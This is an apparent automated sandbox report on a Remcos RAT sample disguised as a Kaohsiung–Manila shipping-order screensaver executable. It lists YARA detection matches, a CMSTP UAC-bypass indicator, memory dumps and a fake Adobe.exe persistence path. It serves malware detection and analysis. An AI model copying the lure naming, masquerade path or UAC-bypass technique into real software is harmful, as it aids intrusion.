                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004158B9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_02BBD63C0_2_02BBD63C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_05286CE80_2_05286CE8
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_052800070_2_05280007
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_052800400_2_05280040
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_05286CE10_2_05286CE1
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FD7080_2_072FD708
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FDC280_2_072FDC28
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FDCFE0_2_072FDCFE
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FAA600_2_072FAA60
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FA7700_2_072FA770
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FA7B80_2_072FA7B8
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FA7C80_2_072FA7C8
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FD6FB0_2_072FD6FB
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FDC1B0_2_072FDC1B
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FAA4F0_2_072FAA4F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041D0713_2_0041D071
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004520D23_2_004520D2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043D0983_2_0043D098
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004371503_2_00437150
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004361AA3_2_004361AA
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004262543_2_00426254
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004313773_2_00431377
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043651C3_2_0043651C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041E5DF3_2_0041E5DF
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044C7393_2_0044C739
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004367C63_2_004367C6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004267CB3_2_004267CB
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043C9DD3_2_0043C9DD
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00432A493_2_00432A49
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00436A8D3_2_00436A8D
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043CC0C3_2_0043CC0C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00436D483_2_00436D48
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00434D223_2_00434D22
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00426E733_2_00426E73
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00440E203_2_00440E20
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043CE3B3_2_0043CE3B
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00412F453_2_00412F45
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00452F003_2_00452F00
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00426FAD3_2_00426FAD
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 4_2_0094D63C4_2_0094D63C
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 8_2_02D2D63C8_2_02D2D63C
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_00B9D63C11_2_00B9D63C
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D76CE811_2_04D76CE8
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D7004011_2_04D70040
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D7000611_2_04D70006
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D76CE111_2_04D76CE1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 13_2_0151D63C13_2_0151D63C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 004020E7 appears 39 times
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 00433FB0 appears 55 times
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2041986593.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2058808858.0000000008DD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000000.2030232586.00000000009FA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuoct.exe4 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeBinary or memory string: OriginalFilenameuoct.exe4 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Adobe.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/5@1/2
